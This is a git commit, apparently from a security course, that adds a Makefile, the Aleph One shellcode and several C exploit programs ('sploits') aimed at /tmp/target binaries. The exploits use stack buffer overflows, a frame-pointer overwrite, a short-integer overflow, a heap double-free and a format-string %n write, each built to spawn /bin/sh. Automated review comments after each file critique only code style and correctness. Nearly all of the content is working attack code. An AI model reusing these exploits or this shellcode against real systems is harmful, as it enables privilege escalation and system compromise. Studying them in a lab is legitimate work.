
Added the sploits

1 parent 92d3a04 commit 02086665a509883225e327129d53b2a7d288c5d4 @atuljangra committed Feb 8, 2014
@@ -0,0 +1,25 @@
+# tools
+CC := gcc
+RM := rm -f
+
+# flags
+CFLAGS := -ggdb
+LDFLAGS :=
+LDLIBS :=
+
+# sources
+sources := sploit1.c sploit2.c sploit3.c sploit4.c sploit5.c sploit6.c sploit7.c sploit-ec.c
+targets := $(sources:.c=)
+
+# gmake magic
+.PHONY: default all clean
+
+#targets
+default: all
+all: $(targets)
+
+clean:
+ $(RM) $(targets) $(sources:.c=.o)
+
+#dependencies
+$(sources:.c=.o): shellcode.h
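Review bot: The header dependency on the last line is attached to object files this Makefile never produces: with `targets := $(sources:.c=)` and no explicit recipe, make builds each sploit directly from its `.c` through the built-in `%: %.c` rule, so editing shellcode.h never triggers a rebuild. Change the last line to `$(targets): shellcode.h`. The `clean` rule's `$(sources:.c=.o)` is harmless but likewise names files that are never created.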
@@ -0,0 +1,7 @@
+/*
+ * Aleph One shellcode.
+ */
+static char shellcode[] =
+ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+ "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+ "\x80\xe8\xdc\xff\xff\xff/bin/sh";
@@ -0,0 +1,55 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include "shellcode.h"
+#include <errno.h>
+#include <sys/stat.h>
+
+#define TARGET "/tmp/target-ec"
+#define SIZE 100
+int main(void)
+{
+ char *args[4];
+ char *env[1];
+
+ /*
+ * Shellcode itself contains /, so we need to create __/
+ * and ___/bin/ before creating the desired file, thus -p
+ * creates a directory whose path is the shellcode
+ */
+ static char mkdir_cmd[] =
+ "mkdir -p \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+ "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+ "\x80\xe8\xdc\xff\xff\xff/bin/sh";
+
+ /*
+ * creates a symlink from 'link' file inside directory to /tmp/target-ec
+ * Do we want to use -f here? Just for the sake of removing already existing warning.
+ */
+ static char ln_cmd[] =
+ "ln -s /tmp/target-ec \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+ "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+ "\x80\xe8\xdc\xff\xff\xff/bin/sh/link";
+
+
+ static char symlinkname[] =
+ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+ "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+ "\x80\xe8\xdc\xff\xff\xff/bin/sh/link";
+
+
+ int a = system (mkdir_cmd);
+ int b = system (ln_cmd);
+ printf("%d %d\n", a, b);
+
+ args[0] = TARGET;
+ args[1] = "0xbffffe7c";
+ args[2] = "0xbfffffc9";
+ args[3] = NULL;
+ env[0] = NULL;
+
+ if (0 > execve(symlinkname, args, env))
+ fprintf(stderr, "execve failed.\n");
+ return 0;
+}
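Review bot: `a` and `b` on the `printf` line are the raw wait statuses returned by `system()`, not the commands' exit codes, so the printed numbers are hard to interpret; decode them with `WEXITSTATUS()` from `<sys/wait.h>` and treat `-1` as a failure to spawn the shell at all. `<errno.h>`, `<sys/stat.h>` and `SIZE` are included or defined but unused in this file. The comment above `ln_cmd` commits an open question (`Do we want to use -f here?`); resolve it or drop it rather than leaving it in the source.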
@@ -0,0 +1,33 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include "shellcode.h"
+
+#define TARGET "/tmp/target1"
+#define NOP 0x90
+int main(void)
+{
+ char *args[3];
+ char *env[1];
+
+ args[0] = TARGET;
+
+ // 132 to reach the return address
+ // 4 for the return address
+ // 1 for NULL
+ args[1] = malloc(137);
+
+ memset(args[1], NOP, 136);
+ args[1][136] = '\0';
+ memcpy(args[1], shellcode, strlen(shellcode));
+ *(unsigned int *)(args[1] + 132) = 0xbffffd78;
+
+ args[2] = NULL;
+ env[0] = NULL;
+
+ if (0 > execve(TARGET, args, env))
+ fprintf(stderr, "execve failed.\n");
+
+ return 0;
+}
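Review bot: The `malloc(137)` result is passed to `memset` unchecked, and the size is a magic number that repeats the arithmetic of the comment above it; the sibling files define `SIZE` for exactly this. `#define SIZE 137` with `args[1] = malloc(SIZE); if (!args[1]) { perror("malloc"); return 1; }` and `memset(args[1], NOP, SIZE - 1)` keeps the comment and the code in one place. `args[0] = TARGET;` also stores a string literal in a non-const `char *`; `char *args[3]` is what `execve` requires, but a comment saying so would save the next reader a warning hunt.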
@@ -0,0 +1,52 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include "shellcode.h"
+
+#define TARGET "/tmp/target2"
+#define NOP 0x90
+#define SIZE 201
+
+int main(void)
+{
+ char *args[3];
+ char *env[1];
+ /* expolit is of type:
+ * nops _____ shellcode _____ shellcode_address ______ %ebp changing byte
+ *
+ */
+ char buffer[SIZE]; // 1 for NULL
+ memset(buffer, NOP, SIZE);
+
+
+ // EBP is at 0xbffff99c val changed into: 0xbffff941
+ // buffer is 0xbffff8d4
+ // Value to be written in the changed ebp si 0x9c - 0x04 (0xbffff998) == 0x98
+ //
+ // addr to shell code is needed to be placed at 0xbffff998, since we have no
+ // ops, that address can be 0xbffff8d8
+ // A8 - 4 because of pop instruction.
+ buffer[SIZE - 1] = 0xA4;
+
+ buffer[SIZE - 2] = 0xbf;
+ buffer[SIZE - 3] = 0xff;
+ buffer[SIZE - 4] = 0xfc;
+ buffer[SIZE - 5] = 0xf4;
+
+
+ // Add the shellcode.
+ int i = SIZE - 5 - strlen(shellcode);
+ memcpy(buffer + i, shellcode, strlen(shellcode));
+
+ args[0] = TARGET;
+
+ args[1] = buffer;
+ args[2] = NULL;
+ env[0] = NULL;
+
+ if (0 > execve(TARGET, args, env))
+ fprintf(stderr, "execve failed.\n");
+
+ return 0;
+}
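Review bot: `buffer` is never NUL-terminated: `memset` fills all `SIZE` bytes and the five stores after it only overwrite the tail, so when `args[1]` reaches `execve` the array is read past its end until a zero byte happens to follow it on the stack (undefined behaviour), and the `// 1 for NULL` comment on the declaration is not true. sploit3 has the same defect and sploit6 has the terminator commented out, whereas sploit1, sploit4 and sploit5 terminate the last byte explicitly. `int i = SIZE - 5 - strlen(shellcode);` also mixes `int` with `size_t`; declare `i` as `size_t`, since with these constants the difference is positive.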
@@ -0,0 +1,41 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include "shellcode.h"
+
+#define TARGET "/tmp/target3"
+#define SIZE 137
+#define NOP 0x90
+int main(void)
+{
+ char *args[3];
+ char *env[1];
+ char buffer[SIZE]; // 1 for NULL
+
+ memset(buffer, NOP, SIZE);
+
+/*
+ * There is no ebp, thus we just want to change the
+ * return address, which is pushed on the stack, so
+ * that it points to one of the arguments, which contains
+ * our shellcode.
+ */
+
+ buffer[SIZE - 1] = 0x6c;
+
+ // Add the shellcode
+ int i = SIZE - 5 - strlen(shellcode);
+ memcpy(buffer + i, shellcode, strlen(shellcode));
+
+ args[0] = TARGET;
+
+ args[1] = buffer;
+ args[2] = NULL;
+ env[0] = NULL;
+
+ if (0 > execve(TARGET, args, env))
+ fprintf(stderr, "execve failed.\n");
+
+ return 0;
+}
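Review bot: The explanatory comment block between `memset` and the `buffer[SIZE - 1]` store sits at column 0 inside the body of `main`, while every other comment in this file and its siblings is indented with the code; indent it to match. The unterminated `buffer` and the signed/`size_t` mix in `int i = ...` are the same defects as in sploit2 and are covered there.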
@@ -0,0 +1,36 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include "shellcode.h"
+
+#define TARGET "/tmp/target4"
+#define NOP 0x90
+#define SIZE 32769
+
+int main(void)
+{
+ char *args[3];
+ char *env[1];
+
+ // Overflow the short.
+ char attack[SIZE];
+
+ memset(attack, NOP, sizeof(attack));
+ attack[32768] = '\0';
+ attack[4019] = 0xbf;
+ attack[4018] = 0xff;
+ attack[4017] = 0x6e;
+ attack[4016] = 0xff;
+
+ memcpy(attack + 100, shellcode, strlen(shellcode));
+
+ args[0] = TARGET;
+ args[1] = attack; args[2] = NULL;
+ env[0] = NULL;
+
+ if (0 > execve(TARGET, args, env))
+ fprintf(stderr, "execve failed.\n");
+
+ return 0;
+}
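Review bot: The stores `attack[4019] = 0xbf;` through `attack[4016] = 0xff;` assign values above 127 to plain `char`, which is an implementation-defined conversion and warns under `-Wconversion`; declaring the buffer as `unsigned char attack[SIZE]` (and casting at the `args[1]` assignment) avoids it, and the same applies to the tail stores in sploit2 and sploit3. The offsets 4016–4019 and 100 are magic numbers with no explanation, unlike sploit2 and sploit5 which comment how their values were obtained; a one-line comment per offset would bring this file to the same standard.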
@@ -0,0 +1,64 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include "shellcode.h"
+
+#define TARGET "/tmp/target5"
+#define SIZE 1024
+#define NOP 0x90
+
+/* We want to create the chunk after and before q
+ * such that while freeing second time, we can get
+ * the eip to the shellcode.
+ */
+int main(void)
+{
+ char *args[3];
+ char *env[1];
+
+ long retAddr, bufAddr, jumpInstruction;
+
+ char attack[SIZE];
+
+ // Filling with 1. This is done so that everything seems free.
+ memset(attack, 1, SIZE);
+
+ retAddr = 0xbffffa8c; // $ebp + 4 or ret for the foo
+ bufAddr = 0x08049bc8; // Starting of the buffer. This will point
+ // to the jmp instruction.
+ /*
+ * Copying into the string.
+ * Got the correct address after some debugging.
+ * p is at 0x08049bc8 and q is at 0x8049d60.
+ */
+
+ memcpy(&attack[400], &bufAddr, 4);
+ memcpy(&attack[404], &retAddr, 4);
+
+ /*
+ * 2 bytes long instrution.
+ * eb: short jump.
+ * 06: 6 bytes.
+ * because, we need to jump 32 - 2 bytes above to reach the shellcode
+ */
+ jumpInstruction = 0xffff1eeb;
+ memcpy(attack, &jumpInstruction, 2);
+
+ /*
+ * Adding shellcode to the attack string
+ */
+ memcpy(attack + 32, shellcode, strlen(shellcode));
+
+ attack[SIZE - 1] = '\0';
+
+ args[0] = TARGET;
+ args[1] = attack;
+ args[2] = NULL;
+ env[0] = NULL;
+
+ if (0 > execve(TARGET, args, env))
+ fprintf(stderr, "execve failed.\n");
+
+ return 0;
+}
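Review bot: The comment above `jumpInstruction` says `06: 6 bytes`, but the value assigned is `0xffff1eeb`, whose displacement byte is `0x1e` (30), which is what the `32 - 2` on the following comment line describes; fix the comment so the two agree (and `instrution` → `instruction`). `retAddr`, `bufAddr` and `jumpInstruction` are `long` but are copied with hard-coded lengths of `4` and `2`, which relies on the platform's endianness and on `long` being at least 4 bytes; `uint32_t` from `<stdint.h>` for the addresses, copied with `sizeof retAddr`, states the intent.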
@@ -0,0 +1,66 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include "shellcode.h"
+
+#define TARGET "/tmp/target6"
+#define SIZE 256
+int main(void)
+{
+ char *args[3];
+ char *env[1];
+
+ char attack[SIZE];
+ char * format;
+ char * dummyAddr;
+ memset(attack, 0x90, SIZE);
+
+ // attack[255] = '\0';
+
+ /*
+ * 4 dummy - address pairs.
+ * This is used as a writing address for the format string.
+ * Address being used: 0xbffffd8c <--- Overwriting this
+ * to go to the shell code.
+ */
+ dummyAddr = "\xff\xff\xff\xff\x8c\xfd\xff\xbf"
+ "\xff\xff\xff\xff\x8d\xfd\xff\xbf"
+ "\xff\xff\xff\xff\x8e\xfd\xff\xbf"
+ "\xff\xff\xff\xff\x8f\xfd\xff\xbf";
+
+ /*
+ * This is calculated properly using the
+ * already written character count.
+ *
+ * sizeof dummyAddr is 32
+ * */
+ format = "%08x%08x%08x"
+ "%165x%n%241x%n%256x%n%192x%n";
+ /*
+ * Attack string is as follows
+ * __________ DummyAddrPairs__________
+ * | |
+ * | |
+ * |____________Shell code____________|
+ * | |
+ * | |
+ * |__________Format string___________|
+ * |...... NOP........ NOP......NOP...|
+ */
+
+ memcpy(attack, dummyAddr, strlen(dummyAddr));
+ memcpy(attack + strlen(dummyAddr), shellcode, strlen(shellcode));
+ memcpy(attack + strlen(shellcode) + strlen(dummyAddr) + 4, format, strlen(format));
+
+
+ args[0] = TARGET;
+ args[1] = attack;
+ args[2] = NULL;
+ env[0] = NULL;
+
+ if (0 > execve(TARGET, args, env))
+ fprintf(stderr, "execve failed.\n");
+
+ return 0;
+}
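Review bot: The `+ 4` in the third `memcpy` is unexplained and contradicts the layout diagram in the comment, which shows the format string following the shellcode directly; either document the 4-byte gap or derive it from a named constant. The comment `sizeof dummyAddr is 32` is wrong as written, since `dummyAddr` is a pointer and it is `strlen(dummyAddr)` that is 32. `format` and `dummyAddr` point to string literals and should be `const char *`, and the commented-out `// attack[255] = '\0';` leaves `attack` unterminated, the defect noted on sploit2.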